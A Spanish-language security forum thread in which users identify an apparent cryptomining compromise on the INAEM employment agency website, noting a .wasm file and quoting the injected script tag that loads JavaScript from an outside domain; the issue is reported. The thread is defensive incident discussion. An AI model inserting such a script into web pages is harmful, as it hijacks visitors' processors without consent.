elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Seguridad (Moderador: r32)
| | |-+  ¿Posible minero en la web del INAEM ?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ¿Posible minero en la web del INAEM ?  (Leído 2,996 veces)
HardC0d3

Desconectado Desconectado

Mensajes: 49



Ver Perfil
¿Posible minero en la web del INAEM ?
« en: 11 Junio 2018, 23:18 pm »

Buenas foro !!

¿Es posible que la web de INAEM tenga un minero?


Al acceder en su página web https://inaem.aragon.es/ el procesador se pone al 100%




Creo que lo que causa este comportamiento es el fichero .wasm cuando se hace la petición a https://www.freecontent.trade./LSQLGnCi.wasm




uBlock Origin no me bloquea nada pero al analizar el archivo LSQLGnCi.wasm en VirusTotal da los siguientes resultados:




Por lo que veo en la wikipedia un fichero .wasm es un formato de código binario portable, para la ejecución íntegra en navegador de scripts de lado del cliente.

https://es.wikipedia.org/wiki/WebAssembly
Citar
WebAssembly, abreviado wasm, es un formato de código binario portable (bytecode), para la ejecución íntegra en navegador de scripts de lado del cliente.

Se trata de un lenguaje de bajo nivel, diseñado inicialmente como formato destino en la compilación desde C y C++. Aunque también soporta código fuente de otros lenguajes, como Rust.

WebAssembly se concibe como una máquina de pila portable, diseñado así para procesarse sintácticamente más rápido que javascript, y mejorar su velocidad de ejecución.

WebAssembly fue anunciado el 17 de junio de 2015. El 15 de marzo de 2016 se hizo una demo ejecutando Unity's Angry Bots en Firefox, Chromium, Google Chrome, y Microsoft Edge

La implementación inicial de soporte para WebAssembly en navegadores se basará en los formatos asm.js, soportado por Mozilla, y PNaCl (Portable Native Client), propuesto por Google. Tras sacar una versión MVP se plantea incorporar recolección de basura,7​ lo que permitirá a lenguajes con este sistema, tales como Java o C# compilarse generando código wasm.

El equipo implicado en el desarrollo de WebAssembly incluye personas vinculadas a Mozilla, Microsoft, Google o Apple.


A ver si alguien mas experto puede arrojar algo de luz al tema.


En línea

#!drvy


Desconectado Desconectado

Mensajes: 5.855



Ver Perfil WWW
Re: ¿Posible minero en la web del INAEM ?
« Respuesta #1 en: 11 Junio 2018, 23:22 pm »

Efectivamente, tienen un miner. Parece ser que han sido comprometidos y les han modificado el template en varios sitios para que ejecute este script:

Código
  1. <script type="text/javascript" src="//upgraderservices.cf/drupal.js"></script>

Saludos


En línea

HardC0d3

Desconectado Desconectado

Mensajes: 49



Ver Perfil
Re: ¿Posible minero en la web del INAEM ?
« Respuesta #2 en: 11 Junio 2018, 23:41 pm »

Gracias #!drvy por confirmarlo. Ya está reportado.

Un saludo!!
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Un troyano bancario usa el 'gancho' del rescate minero de Chile
Noticias
wolfbcn 1 2,330 Último mensaje 3 Septiembre 2010, 01:02 am
por Jeferi
Falso Adobe Flash Player esconde un minero de Bitcoin
Noticias
wolfbcn 0 1,657 Último mensaje 11 Diciembre 2013, 02:23 am
por wolfbcn
Minero de monero que no afecta rendimiento « 1 2 »
Análisis y Diseño de Malware
basurainutil 10 7,288 Último mensaje 18 Febrero 2018, 21:55 pm
por Borito30
duda sobre minero btc
Dudas Generales
yina07 3 2,078 Último mensaje 21 Septiembre 2018, 21:51 pm
por fairlight666
Posible Virus Minero oh malware.
Seguridad
Alessandro_Martini 5 4,396 Último mensaje 5 Agosto 2020, 22:42 pm
por FFernandez
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines